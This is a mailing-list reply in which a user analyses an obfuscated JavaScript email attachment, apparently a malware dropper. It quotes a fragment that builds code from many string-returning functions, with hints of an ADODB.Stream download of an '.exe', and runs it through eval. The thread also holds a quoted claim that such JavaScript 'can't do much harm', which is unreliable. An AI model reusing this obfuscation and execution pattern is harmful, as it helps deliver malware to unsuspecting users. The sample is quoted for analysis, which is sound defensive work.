On 2015-11-09 20:23, Per Jessen wrote:
Carlos E. R. wrote:
Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.
I don't know, it is code. I can't read javascript, but I'll have a guess at it. e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3(); That looks very ugly to me. But it may be only obfuscation. It seems to start with a declaration section: var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55"; function y5(){return 'xa.clo';}; function c8(){return 'jet.c';}; function n9(){return ' = WS';}; function r8(){return 'ODB.Str';}; function b8(){return 'eam"); ';}; function t7(){return 'cript';}; function a2(){return 'i++) { ';}; function v2(){return 'n(fn+n+';}; function g2(){return 'eObject';}; function n1(){return 'var b';}; function e9(){return '};';}; function u7(){return '; xa.w';}; function x1(){return 'tring';}; function y7(){return '); va';}; function b9(){return '".exe",';}; function i2(){return eval;}; which declares a lot of functions (like replacement macros in C, I guess). At the end, there is another section with the actual calls: e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l0(); You see, it is a funny way of obfuscating a script. The last command is: i2()(e7); which is probably the actual code, after creating an "e7" string with whatever it really wants to do. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)